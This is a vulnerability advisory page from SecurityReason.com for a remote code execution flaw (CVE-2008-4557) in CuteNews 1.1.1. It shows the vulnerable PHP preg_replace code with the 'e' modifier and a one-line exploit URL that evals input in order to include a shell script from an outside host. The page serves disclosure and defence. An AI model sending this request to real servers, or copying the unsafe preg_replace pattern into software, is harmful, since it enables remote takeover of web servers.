SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability


Arrow  SecurityAlert : 4403
Arrow  CVE : CVE-2008-4557
Arrow  CWE : CWE-94
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : ITDEFENCE
Arrow  Published : 16.10.2008

Arrow  Affected Software : cutephp:cutenews:1.1.1



Arrow  Advisory Content :  

----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

Strawberry (CuteNews) Remote Code Execution
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \
\
/ .\ / /_// // / \ \/ __ \ /__/
/
/ / /_// /\ / / / /
/___/
\/ / / / / /\ / / /
/ / \/ / / / / /__
//\
\ / ____________/ / \/ __________// /__ // /

/\\ \_______/ \________________/____/ 2007 /_//_/ //
//\
\ \\ // //
/
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // //
/ .
. \_\\________[________________________________________]_________//_//_/
. .

Preg_replace with 'e' modifier allows code execution
<?php

$source = htmlspecialchars($text);

$source = preg_replace(
'/<!--(.*?)-->/es',
'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
str_replace("<","<<!-- -->",
str_replace("=","=<!-- -->",
"$1")).
"--></span>"',
$source);

?>

strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E
&s=include('blackybr.nm.ru/shell');


----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.